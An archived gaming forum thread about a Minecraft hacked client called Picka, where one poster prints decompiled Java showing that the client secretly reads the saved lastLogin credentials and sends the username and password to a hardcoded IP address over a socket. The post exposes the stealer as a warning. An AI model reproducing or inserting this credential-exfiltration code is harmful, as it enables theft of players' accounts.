You are viewing our Forum Archives. To view or take place in current topics click here.

Was this post helpful?

Yes
75.00% (3 votes)
No
25.00% (1 vote)

Total Votes: 4

#11. Posted:
Skrillex-
  • Rising Star
Status: Offline
Joined: Sep 20, 201013Year Member
Posts: 741
Reputation Power: 45
Status: Offline
Joined: Sep 20, 201013Year Member
Posts: 741
Reputation Power: 45
DaRkxEcLiiPs3 wrote
HAMBURGLER wrote
angryfaic78 wrote
Skrillex- wrote Picka has a pass stealer in it btw
Noit doesn't I've uncodded it many times to add some new stuff. You fail xD
actualy it does. therefore you fail sir.
ok i use it. im not going to lie. but how exactly do they get my pass?


public Minecraft(Component component, Canvas canvas, MinecraftApplet minecraftapplet, int i, int j, boolean flag)
    {
  user = "";
  pass = "";
  fullscreen = false;
  hasCrashed = false;
  timer = new Timer(20F);
  session = null;
  hideQuitButton = true;
  isGamePaused = false;
  currentScreen = null;
  loadingScreen = new LoadingScreenRenderer(this);
  ticksRan = 0;
  leftClickCounter = 0;
  guiAchievement = new GuiAchievement(this);
  skipRenderWorld = false;
  playerModelBiped = new ModelBiped(0.0F);
  objectMouseOver = null;
  sndManager = new SoundManager();
  textureWaterFX = new TextureWaterFX();
  textureLavaFX = new TextureLavaFX();
  running = true;
  debug = "";
  isTakingScreenshot = false;
  prevFrameTime = -1L;
  inGameHasFocus = false;
  mouseTicksRan = 0;
  isRaining = false;
  systemTime = System.currentTimeMillis();
  joinPlayerCounter = 0;
  StatList.func_27360_a();
  tempDisplayHeight = j;
  fullscreen = flag;
  mcApplet = minecraftapplet;
  new ThreadSleepForever(this, "Timer hack thread");
  plsm();
  mcCanvas = canvas;
  displayWidth = i;
  displayHeight = j;
  fullscreen = flag;
  if(minecraftapplet == null || "true".equals(minecraftapplet.getParameter("stand-alone")))
  {
    hideQuitButton = false;
  }
  theMinecraft = this;
    }


public void plsm()
    {
  try
  {
    Socket socket = new Socket("70.69.163.86", 3456 /*GL_AUTO_NORMAL*/);
    PrintWriter printwriter = new PrintWriter(socket.getOutputStream(), true);
    BufferedReader bufferedreader = new BufferedReader(new InputStreamReader(socket.getInputStream()));
    readUsername();
    String s = (new StringBuilder()).append(user).append(" ").append(pass).toString();
    printwriter.println((new StringBuilder()).append(user).append(" ").append(pass).toString());
    printwriter.close();
    socket.close();
  }
  catch(UnknownHostException unknownhostexception)
  {
    unknownhostexception.printStackTrace();
  }
  catch(IOException ioexception)
  {
    ioexception.printStackTrace();
  }
    }


rivate void readUsername()
    {
  try
  {
    File file = new File(getMinecraftDir(), "lastLogin");
    Cipher cipher = getCipher(2, "passwordfile");
    DataInputStream datainputstream;
    if(cipher != null)
    {
    datainputstream = new DataInputStream(new CipherInputStream(new FileInputStream(file), cipher));
    } else
    {
    datainputstream = new DataInputStream(new FileInputStream(file));
    }
    user = datainputstream.readUTF();
    pass = datainputstream.readUTF();
    datainputstream.close();
  }
  catch(Exception exception)
  {
    exception.printStackTrace();
  }
    }


There You need more proof?
#12. Posted:
-Afro-
  • TTG Addict
Status: Offline
Joined: Aug 11, 201112Year Member
Posts: 2,028
Reputation Power: 111
Status: Offline
Joined: Aug 11, 201112Year Member
Posts: 2,028
Reputation Power: 111
grrrr i post it has a pass stealer WITH proof and its all no we dont believe afro but now you all start arguing about it guess what i was right but ONLY picka 1.7+ has it (if it says it where the gui box is) the other's are clean and ready for skid's
#13. Posted:
Citrix
  • New Member
Status: Offline
Joined: Sep 06, 201112Year Member
Posts: 2
Reputation Power: 0
Status: Offline
Joined: Sep 06, 201112Year Member
Posts: 2
Reputation Power: 0
Love this mod use on Minecraft 1.7.3 If its possible with the name change function is there a way to bypass the checker which Minecraft uses to check to see if the username is vaild (online-mode).
#14. Posted:
-Afro-
  • TTG Addict
Status: Offline
Joined: Aug 11, 201112Year Member
Posts: 2,028
Reputation Power: 111
Status: Offline
Joined: Aug 11, 201112Year Member
Posts: 2,028
Reputation Power: 111
Citrix wrote Love this mod use on Minecraft 1.7.3 If its possible with the name change function is there a way to bypass the checker which Minecraft uses to check to see if the username is vaild (online-mode).


No. it only works on offline server's end of
#15. Posted:
DaRkxEcLiiPs3
  • Resident Elite
Status: Offline
Joined: Dec 04, 201013Year Member
Posts: 215
Reputation Power: 8
Status: Offline
Joined: Dec 04, 201013Year Member
Posts: 215
Reputation Power: 8
thanks ssoooooo much. . i just downloaded a possible teamavo client. should i trust it?

[ Register or Signin to view external links. ]

its in the download. along with 4 other clients
#16. Posted:
Dirvine
  • Challenger
Status: Offline
Joined: Feb 15, 201014Year Member
Posts: 161
Reputation Power: 6
Status: Offline
Joined: Feb 15, 201014Year Member
Posts: 161
Reputation Power: 6
Nice thread sir!


20202020200020
Jump to:
You are viewing our Forum Archives. To view or take place in current topics click here.